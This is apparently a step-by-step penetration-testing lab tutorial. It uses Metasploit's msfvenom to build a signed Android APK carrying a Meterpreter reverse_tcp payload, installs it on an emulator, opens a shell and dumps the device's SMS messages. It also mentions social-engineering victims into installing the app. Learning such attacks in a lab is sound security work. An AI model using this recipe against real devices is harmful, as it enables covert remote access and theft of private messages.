In previous posts, we saw how Android devices can be used for penetration testing. Let’s reverse the sides and use our Android device as the target. In this post, we will learn how to create an APK file using the tools offered by Metasploit Framework. We will focus on Metasploit's Android-based payloads and use msfvenom to create the APK file.
Step 1: Creating APK
Enter the following command to generate the APK file that will be distributed to the victim:
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.2 LPORT=4444 R > SignApk/evilAndroid.apk
We are entering 10.0.2.2 for "local host" because this is the IP that the emulator uses to communicate with the host computer.
It will take 2-3 minutes for the file to be created.
Step 2: Changing Directories
Once our APK is created, we will need to sign the file. This is an essential step because most Android devices won't install unsigned applications. Signing an APK is a multi-step process, however, we can simplify it by using a pre-generated certificate and key files with the signapk.jar utility. We saved them all in the same directory where we put our APK. Change to this directory as follows:
Step 3: Signing APK
Run the command below to sign the APK. Our signed file will be saved as evilAndroidc.apk.
java -jar signapk.jar certificate.pem key.pk8 evilAndroid.apk evilAndroidc.apk
To make sure that the file was created, do the listing of the working directory:
Step 4: Starting Metasploit Listener
Now let's start Metasploit listener. We've done the step-by-step setup in other labs, now let's do it it all at once, with a one-liner command:
msfconsole -L -q -x "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 4444; run"
The -q option is for "quiet" which disables the displaying banner and version information. Note that we are using the actual localhost IP this time, not the one that Android uses.
Now open up a new tab with help of the following command: Ctrl + Shift + T
Step 5: Starting Android Emulator
Enter the following command to start the Android emulator instance that we will use as our target:
android-sdk-linux/tools/emulator @android17 -no-window
It may take several minutes for the emulator instance to start. Be patient.
Step 6: Migrating Consoles
Next, we need to upload our malicious APK. In a real life scenario, you will need to use some social engineering techniques to trick the device owner into downloading and installing your APK. Let's say we did that and now we will play the victim.
Open up a new tab "Tab 3".
Step 7: Installing APK
To install the APK, enter the command below. Make sure to use the signed version of the APK: evilAdnroidc.apk, not the original evilAndroid.apk:
adb install SignApk/evilAndroidc.apk
You will get the "device offline" error at first: it takes some time for the emulated device to connect to the ADB server. If returned to prompt, try again. Keep re-entering the command until you see the "Success" message (you may have to try several times).
Step 8: Launching App
Next, we need to launch the application. Opening apps from command line is a bit tricky: you need to know the name of the package and of the Activity. We looked it up for you, so just enter the following command to run the app:
adb shell am start com.metasploit.stage/.MainActivity
Step 9: Getting a Shell
Now go back to the Metasploit listener running in "Console Tab 1".
We got a Meterpreter shell!
Step 10: Using Meterpreter on Android
Android Meterpreter is similar to the Linux version that we used in other labs, however, it has some unique options as well. Enter help to see the available commands.
Step 11: Getting System Information
Enter sysinfo to get information about the target system:
Step 12: Migrating Consoles
One of the most useful Meterpreter options is dump_sms, which does just that: dumping all SMS messages from the device into a text file.
Migrate to "Console tab 3" to send an SMS message to our device.
Step 13: Sending SMS
We can use Telnet to send SMS messages to emulated devices. First, open a Telnet session as follows:
telnet localhost 5554
Next, enter sms send followed by a phone number and message. You can use any values for these, just don't include any dashes in the phone number and make sure that your message is in quotes, for example:
sms send 1112223333 "Hey there"
Now again switch back to console tab 1.
Step 14: Dumping SMS
Enter the* dump_sms *command:
Note the name of the dump file. It will be saved in the current working directory. Enter exit twice to close the Meterpreter shell and exit out of Metasploit.
Step 15: Reading SMS Dump
Enter the following command to read the SMS file (enter the file name with your timestamp):
We can see the contents of the messages as well as the associated metadata.
Also read: Hacking with Android